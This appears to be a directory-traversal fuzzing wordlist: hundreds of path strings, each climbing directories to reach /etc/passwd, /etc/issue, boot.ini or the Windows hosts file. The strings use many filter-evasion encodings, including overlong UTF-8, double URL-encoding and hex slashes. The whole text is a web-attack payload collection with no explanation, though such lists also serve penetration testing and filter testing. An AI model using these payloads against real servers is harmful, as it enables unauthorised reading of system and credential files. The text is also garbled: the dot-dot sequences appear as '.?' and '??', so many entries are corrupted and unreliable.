-.?%%35%%63.?%%35%%63.?%%35%%63.?%%35%%63.?%%35%%63.?%%35%%63etc%%35%%63issue -.?%%35%%63.?%%35%%63.?%%35%%63.?%%35%%63.?%%35%%63.?%%35%%63boot.ini -.?%%35%%63.?%%35%%63.?%%35%%63.?%%35%%63.?%%35%%63.?%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -.?%e0%80%afetc%e0%80%afpasswd -.?%e0%80%afetc%e0%80%afissue -.?%e0%80%afboot.ini -.?%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -.?%e0%80%af.?%e0%80%afetc%e0%80%afpasswd -.?%e0%80%af.?%e0%80%afetc%e0%80%afissue -.?%e0%80%af.?%e0%80%afboot.ini -.?%e0%80%af.?%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -.?%e0%80%af.?%e0%80%af.?%e0%80%afetc%e0%80%afpasswd -.?%e0%80%af.?%e0%80%af.?%e0%80%afetc%e0%80%afissue -.?%e0%80%af.?%e0%80%af.?%e0%80%afboot.ini -.?%e0%80%af.?%e0%80%af.?%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -.?%e0%80%af.?%e0%80%af.?%e0%80%af.?%e0%80%afetc%e0%80%afpasswd -.?%e0%80%af.?%e0%80%af.?%e0%80%af.?%e0%80%afetc%e0%80%afissue -.?%e0%80%af.?%e0%80%af.?%e0%80%af.?%e0%80%afboot.ini -.?%e0%80%af.?%e0%80%af.?%e0%80%af.?%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -.?%e0%80%af.?%e0%80%af.?%e0%80%af.?%e0%80%af.?%e0%80%afetc%e0%80%afpasswd -.?%e0%80%af.?%e0%80%af.?%e0%80%af.?%e0%80%af.?%e0%80%afetc%e0%80%afissue -.?%e0%80%af.?%e0%80%af.?%e0%80%af.?%e0%80%af.?%e0%80%afboot.ini -.?%e0%80%af.?%e0%80%af.?%e0%80%af.?%e0%80%af.?%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -.?%e0%80%af.?%e0%80%af.?%e0%80%af.?%e0%80%af.?%e0%80%af.?%e0%80%afetc%e0%80%afpasswd -.?%e0%80%af.?%e0%80%af.?%e0%80%af.?%e0%80%af.?%e0%80%af.?%e0%80%afetc%e0%80%afissue -.?%e0%80%af.?%e0%80%af.?%e0%80%af.?%e0%80%af.?%e0%80%af.?%e0%80%afboot.ini -.?%e0%80%af.?%e0%80%af.?%e0%80%af.?%e0%80%af.?%e0%80%af.?%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -.?%25c1%259cetc%25c1%259cpasswd -.?%25c1%259cetc%25c1%259cissue -.?%25c1%259cboot.ini -.?%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -.?%25c1%259c.?%25c1%259cetc%25c1%259cpasswd -.?%25c1%259c.?%25c1%259cetc%25c1%259cissue -.?%25c1%259c.?%25c1%259cboot.ini -.?%25c1%259c.?%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -.?%25c1%259c.?%25c1%259c.?%25c1%259cetc%25c1%259cpasswd -.?%25c1%259c.?%25c1%259c.?%25c1%259cetc%25c1%259cissue -.?%25c1%259c.?%25c1%259c.?%25c1%259cboot.ini -.?%25c1%259c.?%25c1%259c.?%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -.?%25c1%259c.?%25c1%259c.?%25c1%259c.?%25c1%259cetc%25c1%259cpasswd -.?%25c1%259c.?%25c1%259c.?%25c1%259c.?%25c1%259cetc%25c1%259cissue -.?%25c1%259c.?%25c1%259c.?%25c1%259c.?%25c1%259cboot.ini -.?%25c1%259c.?%25c1%259c.?%25c1%259c.?%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -.?%25c1%259c.?%25c1%259c.?%25c1%259c.?%25c1%259c.?%25c1%259cetc%25c1%259cpasswd -.?%25c1%259c.?%25c1%259c.?%25c1%259c.?%25c1%259c.?%25c1%259cetc%25c1%259cissue -.?%25c1%259c.?%25c1%259c.?%25c1%259c.?%25c1%259c.?%25c1%259cboot.ini -.?%25c1%259c.?%25c1%259c.?%25c1%259c.?%25c1%259c.?%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -.?%25c1%259c.?%25c1%259c.?%25c1%259c.?%25c1%259c.?%25c1%259c.?%25c1%259cetc%25c1%259cpasswd -.?%25c1%259c.?%25c1%259c.?%25c1%259c.?%25c1%259c.?%25c1%259c.?%25c1%259cetc%25c1%259cissue -.?%25c1%259c.?%25c1%259c.?%25c1%259c.?%25c1%259c.?%25c1%259c.?%25c1%259cboot.ini -.?%25c1%259c.?%25c1%259c.?%25c1%259c.?%25c1%259c.?%25c1%259c.?%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -.?%25c0%25afetc%25c0%25afpasswd -.?%25c0%25afetc%25c0%25afissue -.?%25c0%25afboot.ini -.?%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -.?%25c0%25af.?%25c0%25afetc%25c0%25afpasswd -.?%25c0%25af.?%25c0%25afetc%25c0%25afissue -.?%25c0%25af.?%25c0%25afboot.ini -.?%25c0%25af.?%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -.?%25c0%25af.?%25c0%25af.?%25c0%25afetc%25c0%25afpasswd -.?%25c0%25af.?%25c0%25af.?%25c0%25afetc%25c0%25afissue -.?%25c0%25af.?%25c0%25af.?%25c0%25afboot.ini -.?%25c0%25af.?%25c0%25af.?%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -.?%25c0%25af.?%25c0%25af.?%25c0%25af.?%25c0%25afetc%25c0%25afpasswd -.?%25c0%25af.?%25c0%25af.?%25c0%25af.?%25c0%25afetc%25c0%25afissue -.?%25c0%25af.?%25c0%25af.?%25c0%25af.?%25c0%25afboot.ini -.?%25c0%25af.?%25c0%25af.?%25c0%25af.?%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -.?%25c0%25af.?%25c0%25af.?%25c0%25af.?%25c0%25af.?%25c0%25afetc%25c0%25afpasswd -.?%25c0%25af.?%25c0%25af.?%25c0%25af.?%25c0%25af.?%25c0%25afetc%25c0%25afissue -.?%25c0%25af.?%25c0%25af.?%25c0%25af.?%25c0%25af.?%25c0%25afboot.ini -.?%25c0%25af.?%25c0%25af.?%25c0%25af.?%25c0%25af.?%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -.?%25c0%25af.?%25c0%25af.?%25c0%25af.?%25c0%25af.?%25c0%25af.?%25c0%25afetc%25c0%25afpasswd -.?%25c0%25af.?%25c0%25af.?%25c0%25af.?%25c0%25af.?%25c0%25af.?%25c0%25afetc%25c0%25afissue -.?%25c0%25af.?%25c0%25af.?%25c0%25af.?%25c0%25af.?%25c0%25af.?%25c0%25afboot.ini -.?%25c0%25af.?%25c0%25af.?%25c0%25af.?%25c0%25af.?%25c0%25af.?%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -.?%f0%80%80%afetc%f0%80%80%afpasswd -.?%f0%80%80%afetc%f0%80%80%afissue -.?%f0%80%80%afboot.ini -.?%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -.?%f0%80%80%af.?%f0%80%80%afetc%f0%80%80%afpasswd -.?%f0%80%80%af.?%f0%80%80%afetc%f0%80%80%afissue -.?%f0%80%80%af.?%f0%80%80%afboot.ini -.?%f0%80%80%af.?%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%afetc%f0%80%80%afpasswd -.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%afetc%f0%80%80%afissue -.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%afboot.ini -.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%afetc%f0%80%80%afpasswd -.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%afetc%f0%80%80%afissue -.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%afboot.ini -.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%afetc%f0%80%80%afpasswd -.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%afetc%f0%80%80%afissue -.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%afboot.ini -.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%afetc%f0%80%80%afpasswd -.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%afetc%f0%80%80%afissue -.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%afboot.ini -.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%af.?%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -.?%f8%80%80%80%afetc%f8%80%80%80%afpasswd -.?%f8%80%80%80%afetc%f8%80%80%80%afissue -.?%f8%80%80%80%afboot.ini -.?%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -.?%f8%80%80%80%af.?%f8%80%80%80%afetc%f8%80%80%80%afpasswd -.?%f8%80%80%80%af.?%f8%80%80%80%afetc%f8%80%80%80%afissue -.?%f8%80%80%80%af.?%f8%80%80%80%afboot.ini -.?%f8%80%80%80%af.?%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%afetc%f8%80%80%80%afpasswd -.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%afetc%f8%80%80%80%afissue -.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%afboot.ini -.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%afetc%f8%80%80%80%afpasswd -.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%afetc%f8%80%80%80%afissue -.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%afboot.ini -.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%afetc%f8%80%80%80%afpasswd -.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%afetc%f8%80%80%80%afissue -.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%afboot.ini -.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%afetc%f8%80%80%80%afpasswd -.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%afetc%f8%80%80%80%afissue -.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%afboot.ini -.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%af.?%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -??/etc/passwd -??/etc/issue -??/boot.ini -??/windows/system32/drivers/etc/hosts -??/??/etc/passwd -??/??/etc/issue -??/??/boot.ini -??/??/windows/system32/drivers/etc/hosts -??/??/??/etc/passwd -??/??/??/etc/issue -??/??/??/boot.ini -??/??/??/windows/system32/drivers/etc/hosts -??/??/??/??/etc/passwd -??/??/??/??/etc/issue -??/??/??/??/boot.ini -??/??/??/??/windows/system32/drivers/etc/hosts -??/??/??/??/??/etc/passwd -??/??/??/??/??/etc/issue -??/??/??/??/??/boot.ini -??/??/??/??/??/windows/system32/drivers/etc/hosts -??/??/??/??/??/??/etc/passwd -??/??/??/??/??/??/etc/issue -??/??/??/??/??/??/boot.ini -??/??/??/??/??/??/windows/system32/drivers/etc/hosts -??\etc\passwd -??\etc\issue -??\boot.ini -??\windows\system32\drivers\etc\hosts -??\??\etc\passwd -??\??\etc\issue -??\??\boot.ini -??\??\windows\system32\drivers\etc\hosts -??\??\??\etc\passwd -??\??\??\etc\issue -??\??\??\boot.ini -??\??\??\windows\system32\drivers\etc\hosts -??\??\??\??\etc\passwd -??\??\??\??\etc\issue -??\??\??\??\boot.ini -??\??\??\??\windows\system32\drivers\etc\hosts -??\??\??\??\??\etc\passwd -??\??\??\??\??\etc\issue -??\??\??\??\??\boot.ini -??\??\??\??\??\windows\system32\drivers\etc\hosts -??\??\??\??\??\??\etc\passwd -??\??\??\??\??\??\etc\issue -??\??\??\??\??\??\boot.ini -??\??\??\??\??\??\windows\system32\drivers\etc\hosts -??%2fetc%2fpasswd -??%2fetc%2fissue -??%2fboot.ini -??%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -??%2f??%2fetc%2fpasswd -??%2f??%2fetc%2fissue -??%2f??%2fboot.ini -??%2f??%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -??%2f??%2f??%2fetc%2fpasswd -??%2f??%2f??%2fetc%2fissue -??%2f??%2f??%2fboot.ini -??%2f??%2f??%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -??%2f??%2f??%2f??%2fetc%2fpasswd -??%2f??%2f??%2f??%2fetc%2fissue -??%2f??%2f??%2f??%2fboot.ini -??%2f??%2f??%2f??%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -??%2f??%2f??%2f??%2f??%2fetc%2fpasswd -??%2f??%2f??%2f??%2f??%2fetc%2fissue -??%2f??%2f??%2f??%2f??%2fboot.ini -??%2f??%2f??%2f??%2f??%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -??%2f??%2f??%2f??%2f??%2f??%2fetc%2fpasswd -??%2f??%2f??%2f??%2f??%2f??%2fetc%2fissue -??%2f??%2f??%2f??%2f??%2f??%2fboot.ini -??%2f??%2f??%2f??%2f??%2f??%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -??%5cetc%5cpasswd -??%5cetc%5cissue -??%5cboot.ini -??%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -??%5c??%5cetc%5cpasswd -??%5c??%5cetc%5cissue -??%5c??%5cboot.ini -??%5c??%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -??%5c??%5c??%5cetc%5cpasswd -??%5c??%5c??%5cetc%5cissue -??%5c??%5c??%5cboot.ini -??%5c??%5c??%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -??%5c??%5c??%5c??%5cetc%5cpasswd -??%5c??%5c??%5c??%5cetc%5cissue -??%5c??%5c??%5c??%5cboot.ini -??%5c??%5c??%5c??%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -??%5c??%5c??%5c??%5c??%5cetc%5cpasswd -??%5c??%5c??%5c??%5c??%5cetc%5cissue -??%5c??%5c??%5c??%5c??%5cboot.ini -??%5c??%5c??%5c??%5c??%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -??%5c??%5c??%5c??%5c??%5c??%5cetc%5cpasswd -??%5c??%5c??%5c??%5c??%5c??%5cetc%5cissue -??%5c??%5c??%5c??%5c??%5c??%5cboot.ini -??%5c??%5c??%5c??%5c??%5c??%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -??0x2fetc0x2fpasswd -??0x2fetc0x2fissue -??0x2fboot.ini -??0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -??0x2f??0x2fetc0x2fpasswd -??0x2f??0x2fetc0x2fissue -??0x2f??0x2fboot.ini -??0x2f??0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -??0x2f??0x2f??0x2fetc0x2fpasswd -??0x2f??0x2f??0x2fetc0x2fissue -??0x2f??0x2f??0x2fboot.ini -??0x2f??0x2f??0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -??0x2f??0x2f??0x2f??0x2fetc0x2fpasswd -??0x2f??0x2f??0x2f??0x2fetc0x2fissue -??0x2f??0x2f??0x2f??0x2fboot.ini -??0x2f??0x2f??0x2f??0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -??0x2f??0x2f??0x2f??0x2f??0x2fetc0x2fpasswd -??0x2f??0x2f??0x2f??0x2f??0x2fetc0x2fissue -??0x2f??0x2f??0x2f??0x2f??0x2fboot.ini -??0x2f??0x2f??0x2f??0x2f??0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -??0x2f??0x2f??0x2f??0x2f??0x2f??0x2fetc0x2fpasswd -??0x2f??0x2f??0x2f??0x2f??0x2f??0x2fetc0x2fissue -??0x2f??0x2f??0x2f??0x2f??0x2f??0x2fboot.ini -??0x2f??0x2f??0x2f??0x2f??0x2f??0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -??0x5cetc0x5cpasswd -??0x5cetc0x5cissue -??0x5cboot.ini -??0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -??0x5c??0x5cetc0x5cpasswd -??0x5c??0x5cetc0x5cissue -??0x5c??0x5cboot.ini -??0x5c??0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -??0x5c??0x5c??0x5cetc0x5cpasswd -??0x5c??0x5c??0x5cetc0x5cissue -??0x5c??0x5c??0x5cboot.ini -??0x5c??0x5c??0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -??0x5c??0x5c??0x5c??0x5cetc0x5cpasswd -??0x5c??0x5c??0x5c??0x5cetc0x5cissue -??0x5c??0x5c??0x5c??0x5cboot.ini -??0x5c??0x5c??0x5c??0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -??0x5c??0x5c??0x5c??0x5c??0x5cetc0x5cpasswd -??0x5c??0x5c??0x5c??0x5c??0x5cetc0x5cissue -??0x5c??0x5c??0x5c??0x5c??0x5cboot.ini -??0x5c??0x5c??0x5c??0x5c??0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -??0x5c??0x5c??0x5c??0x5c??0x5c??0x5cetc0x5cpasswd -??0x5c??0x5c??0x5c??0x5c??0x5c??0x5cetc0x5cissue -??0x5c??0x5c??0x5c??0x5c??0x5c??0x5cboot.ini -??0x5c??0x5c??0x5c??0x5c??0x5c??0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -??%252fetc%252fpasswd -??%252fetc%252fissue -??%252fboot.ini -??%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -??%252f??%252fetc%252fpasswd -??%252f??%252fetc%252fissue -??%252f??%252fboot.ini -??%252f??%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -??%252f??%252f??%252fetc%252fpasswd -??%252f??%252f??%252fetc%252fissue -??%252f??%252f??%252fboot.ini -??%252f??%252f??%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -??%252f??%252f??%252f??%252fetc%252fpasswd -??%252f??%252f??%252f??%252fetc%252fissue -??%252f??%252f??%252f??%252fboot.ini -??%252f??%252f??%252f??%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -??%252f??%252f??%252f??%252f??%252fetc%252fpasswd -??%252f??%252f??%252f??%252f??%252fetc%252fissue -??%252f??%252f??%252f??%252f??%252fboot.ini -??%252f??%252f??%252f??%252f??%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -??%252f??%252f??%252f??%252f??%252f??%252fetc%252fpasswd -??%252f??%252f??%252f??%252f??%252f??%252fetc%252fissue -??%252f??%252f??%252f??%252f??%252f??%252fboot.ini -??%252f??%252f??%252f??%252f??%252f??%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -??%255cetc%255cpasswd -??%255cetc%255cissue -??%255cboot.ini -??%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -??%255c??%255cetc%255cpasswd -??%255c??%255cetc%255cissue -??%255c??%255cboot.ini -??%255c??%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -??%255c??%255c??%255cetc%255cpasswd -??%255c??%255c??%255cetc%255cissue -??%255c??%255c??%255cboot.ini -??%255c??%255c??%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -??%255c??%255c??%255c??%255cetc%255cpasswd -??%255c??%255c??%255c??%255cetc%255cissue -??%255c??%255c??%255c??%255cboot.ini -??%255c??%255c??%255c??%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -??%255c??%255c??%255c??%255c??%255cetc%255cpasswd -??%255c??%255c??%255c??%255c??%255cetc%255cissue -??%255c??%255c??%255c??%255c??%255cboot.ini -??%255c??%255c??%255c??%255c??%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -??%255c??%255c??%255c??%255c??%255c??%255cetc%255cpasswd -??%255c??%255c??%255c??%255c??%255c??%255cetc%255cissue -??%255c??%255c??%255c??%255c??%255c??%255cboot.ini -??%255c??%255c??%255c??%255c??%255c??%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -??%c0%2fetc%c0%2fpasswd -??%c0%2fetc%c0%2fissue -??%c0%2fboot.ini -??%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -??%c0%2f??%c0%2fetc%c0%2fpasswd -??%c0%2f??%c0%2fetc%c0%2fissue -??%c0%2f??%c0%2fboot.ini -??%c0%2f??%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -??%c0%2f??%c0%2f??%c0%2fetc%c0%2fpasswd -??%c0%2f??%c0%2f??%c0%2fetc%c0%2fissue -??%c0%2f??%c0%2f??%c0%2fboot.ini -??%c0%2f??%c0%2f??%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -??%c0%2f??%c0%2f??%c0%2f??%c0%2fetc%c0%2fpasswd -??%c0%2f??%c0%2f??%c0%2f??%c0%2fetc%c0%2fissue -??%c0%2f??%c0%2f??%c0%2f??%c0%2fboot.ini -??%c0%2f??%c0%2f??%c0%2f??%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -??%c0%2f??%c0%2f??%c0%2f??%c0%2f??%c0%2fetc%c0%2fpasswd -??%c0%2f??%c0%2f??%c0%2f??%c0%2f??%c0%2fetc%c0%2fissue -??%c0%2f??%c0%2f??%c0%2f??%c0%2f??%c0%2fboot.ini -??%c0%2f??%c0%2f??%c0%2f??%c0%2f??%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -??%c0%2f??%c0%2f??%c0%2f??%c0%2f??%c0%2f??%c0%2fetc%c0%2fpasswd -??%c0%2f??%c0%2f??%c0%2f??%c0%2f??%c0%2f??%c0%2fetc%c0%2fissue -??%c0%2f??%c0%2f??%c0%2f??%c0%2f??%c0%2f??%c0%2fboot.ini -??%c0%2f??%c0%2f??%c0%2f??%c0%2f??%c0%2f??%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -??%c0%afetc%c0%afpasswd -??%c0%afetc%c0%afissue -??%c0%afboot.ini -??%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -??%c0%af??%c0%afetc%c0%afpasswd -??%c0%af??%c0%afetc%c0%afissue -??%c0%af??%c0%afboot.ini -??%c0%af??%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -??%c0%af??%c0%af??%c0%afetc%c0%afpasswd -??%c0%af??%c0%af??%c0%afetc%c0%afissue -??%c0%af??%c0%af??%c0%afboot.ini -??%c0%af??%c0%af??%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -??%c0%af??%c0%af??%c0%af??%c0%afetc%c0%afpasswd -??%c0%af??%c0%af??%c0%af??%c0%afetc%c0%afissue -??%c0%af??%c0%af??%c0%af??%c0%afboot.ini -??%c0%af??%c0%af??%c0%af??%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -??%c0%af??%c0%af??%c0%af??%c0%af??%c0%afetc%c0%afpasswd -??%c0%af??%c0%af??%c0%af??%c0%af??%c0%afetc%c0%afissue -??%c0%af??%c0%af??%c0%af??%c0%af??%c0%afboot.ini -??%c0%af??%c0%af??%c0%af??%c0%af??%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -??%c0%af??%c0%af??%c0%af??%c0%af??%c0%af??%c0%afetc%c0%afpasswd -??%c0%af??%c0%af??%c0%af??%c0%af??%c0%af??%c0%afetc%c0%afissue -??%c0%af??%c0%af??%c0%af??%c0%af??%c0%af??%c0%afboot.ini -??%c0%af??%c0%af??%c0%af??%c0%af??%c0%af??%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -??%c0%5cetc%c0%5cpasswd -??%c0%5cetc%c0%5cissue -??%c0%5cboot.ini -??%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -??%c0%5c??%c0%5cetc%c0%5cpasswd -??%c0%5c??%c0%5cetc%c0%5cissue -??%c0%5c??%c0%5cboot.ini -??%c0%5c??%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -??%c0%5c??%c0%5c??%c0%5cetc%c0%5cpasswd -??%c0%5c??%c0%5c??%c0%5cetc%c0%5cissue -??%c0%5c??%c0%5c??%c0%5cboot.ini -??%c0%5c??%c0%5c??%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -??%c0%5c??%c0%5c??%c0%5c??%c0%5cetc%c0%5cpasswd -??%c0%5c??%c0%5c??%c0%5c??%c0%5cetc%c0%5cissue -??%c0%5c??%c0%5c??%c0%5c??%c0%5cboot.ini -??%c0%5c??%c0%5c??%c0%5c??%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -??%c0%5c??%c0%5c??%c0%5c??%c0%5c??%c0%5cetc%c0%5cpasswd -??%c0%5c??%c0%5c??%c0%5c??%c0%5c??%c0%5cetc%c0%5cissue -??%c0%5c??%c0%5c??%c0%5c??%c0%5c??%c0%5cboot.ini -??%c0%5c??%c0%5c??%c0%5c??%c0%5c??%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -??%c0%5c??%c0%5c??%c0%5c??%c0%5c??%c0%5c??%c0%5cetc%c0%5cpasswd -??%c0%5c??%c0%5c??%c0%5c??%c0%5c??%c0%5c??%c0%5cetc%c0%5cissue -??%c0%5c??%c0%5c??%c0%5c??%c0%5c??%c0%5c??%c0%5cboot.ini -??%c0%5c??%c0%5c??%c0%5c??%c0%5c??%c0%5c??%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -??%c1%9cetc%c1%9cpasswd -??%c1%9cetc%c1%9cissue -??%c1%9cboot.ini -??%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -??%c1%9c??%c1%9cetc%c1%9cpasswd -??%c1%9c??%c1%9cetc%c1%9cissue -??%c1%9c??%c1%9cboot.ini 